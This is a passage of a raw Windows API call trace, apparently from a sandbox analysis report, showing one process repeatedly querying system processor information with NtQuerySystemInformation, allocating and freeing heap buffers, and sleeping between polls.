ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.723] Sleep (dwMilliseconds=0x110) [0224.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.738] Sleep (dwMilliseconds=0x110) [0224.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.752] Sleep (dwMilliseconds=0x110) [0224.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.763] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.770] Sleep (dwMilliseconds=0x110) [0224.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.785] Sleep (dwMilliseconds=0x110) [0224.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.802] Sleep (dwMilliseconds=0x110) [0224.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.815] Sleep (dwMilliseconds=0x110) [0224.836] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.836] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.837] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.837] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.837] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.837] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.837] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.837] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.838] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.838] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.838] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.838] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.838] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.839] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.839] Sleep (dwMilliseconds=0x110) [0224.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.865] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.866] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.866] Sleep (dwMilliseconds=0x110) [0224.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.879] Sleep (dwMilliseconds=0x110) [0224.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.894] Sleep (dwMilliseconds=0x110) [0224.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.923] Sleep (dwMilliseconds=0x110) [0224.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.942] Sleep (dwMilliseconds=0x110) [0224.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.959] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.960] Sleep (dwMilliseconds=0x110) [0224.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.966] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 